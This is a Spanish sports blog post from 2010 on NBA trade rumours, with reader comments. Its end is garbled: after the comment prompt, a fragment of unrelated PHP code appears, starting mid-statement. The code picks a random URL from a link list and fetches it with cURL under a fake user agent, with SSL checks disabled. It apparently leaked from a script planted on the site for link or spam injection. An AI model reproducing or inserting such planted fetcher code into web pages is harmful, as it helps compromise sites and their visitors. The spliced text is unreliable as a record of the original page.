Rumorología

11 de January de 2010 por txusma

Anoche ya estuvimos comentando el principal rumor que recorría la NBA: la posibilidad de un trueque entre Lakers y Raptors que implicaría a Andrew Bynum y Chris Bosh. Un traspaso bomba en todos los aspectos. No sabemos si Bosh recalará finalmente en los Lakers pero lo que si parece seguro es que abandonará la franquicia antes del cierre del período de traspasos.

Pero no es este el único rumor que suena con insistencia ni el único que implica a jugadores de calidad contrastada. Hoy nos levantamos con la noticia de que el jugador de los Wolves, Al Jefferson, ha sido ofrecido a los Pacers a cambio de Danny Granger y Mike Dunleavy. Parece ser que puede haber algún problema de “química” entre Jefferson y Love y los directivos de Minnesota han decidido intentar colocar a Big Al. En todo caso, no parece probable que los Pacers cierren ningún traspaso que involucre a Danny Granger o Roy Hibbert. De todas maneras habrá que estar atento a cualquier movimiento.

También se comentaba ayer que Antawn Jamison puede ser traspasado (lo que junto con la sanción a Gilbert Arenas significaria el fin de ciclo de estos Wizards) a los Cavs. La franquicia de Lebron está buscando un ala-pívot tirador del perfil de ex de los Tar Heels o de Troy Murphy. JJ Hickson y el expiring de Ilgauskas pueden ser la moneda de cambio.

Muchos frentes abiertos y muchos posibles movimientos importantes antes del 18 de Febrero. ¡Que nadie se despiste!

UPDATE: Algunos rumores más:

– Denver está interesado en hacerse con los servicios de algún pívot y el hombre escogido es Jeff Foster. El problema principal es que al pívot de los Pacers aún le queda otra temporada más de contrato.
– A los Pistons les gustaría traspasar a RIP Hamilton debido a la sobredosis de jugadores en el backcourt pero seguramente es Tayshaun Prince el que tiene más posibilidades para salir debido a su más “amable” contrato.
– Tyrus Thomas también está disponible para la franquicia que lo quiera. De hecho, los Bulls draftearon a Taj Gibson pensando ya en esta posibilidad.
– Los Rockets siguen estudiando posibilidades de traspaso con Tracy McGrady pero evidentemente, los 22 millones de salario que cobra hacne muy complicado igualar el trade.

Comenta

3 comentarios a esta entrada

  1. arivas dice:
    #1

    MMMmmmm intresantes estos posibles movimietos, pero creo que hay que hacer tambien el análisis al contrario, quiero decir, habrá que ver que buscan los Raptors que Bynum tiene un contraro largo y sus problemas con las lesiones deberian hacer dudar a cualuqiera.

    Desde luego que desde el punto de vista laker juntar a Bosh, aunque os genere dudas de compatibilidad con Pau, para mi sería tremendo. Pero vuelvo a repetir que no lo veo tan claro para Toronro.

    De todos modos si Bosh llega a algun equipo de los punteros puede ser un factor clave.

      Citar

  2. pcerezo dice:
    #2

    Lo de Bosh difícil…pero si Jamison ficha por Cavs podríamos hablar de un Trade&Ring.

    Un saludo,
    Pablo

      Citar

  3. Vader dice:
    #3

    Aunque no soy de los Cavs ojala se haga lo de Jamison. Me gusta mucho ese jugador y seria tremendo verlo en un equipo con aspiraciones reales. A parte de ver por fin a Lebron con un guardaspaldas de verdad a su lado. A los Cavs de Lebron les ha faltado calidad ofensiva y alternativa al Elegido desde que este fue drafteado… si acaso los primeros años de Ilgauskas pero el lituano ya no esta para estos trotes.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>